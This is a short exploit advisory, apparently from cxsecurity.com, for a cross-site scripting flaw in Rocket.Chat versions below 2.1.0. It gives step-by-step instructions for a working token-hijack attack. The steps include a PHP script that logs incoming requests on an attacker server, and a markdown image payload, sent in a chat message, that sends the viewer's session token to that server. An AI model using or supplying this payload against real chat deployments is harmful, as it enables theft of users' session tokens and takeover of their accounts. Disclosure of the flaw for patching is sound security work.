Rocket.Chat - Cross Site Scripting Exploit (Token Hijack)

2019.10.02
ir 3H34N (IR) ir
Risk: Low
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

#[+] Title: Rocket.Chat - Cross Site Scripting Exploit (Token Hijack) #[+] Product: Rocket.Chat #[+] Vendor: https://rocket.chat/ #[+] Vulnerable Version(s): Rocket.Chat < 2.1.0 # # # Author : 3H34N # Ehsan Nezami # Website : nezami.me # Twitter : https://twitter.com/mr_ehsane # Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp) 1. Create l33t.php on a web server <?php $output = fopen("logs.txt", "a+") or die("WTF? o.O"); $leet = $_GET['leet']."\n\n"; fwrite($output, $leet); fclose($output); ?> 2. Open a chat session 3. Send payload with your web server url ![title](http://10.10.1.5/l33t.php?leet=+`{}token`) 4. Token will be written in logs.txt when target seen your message.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top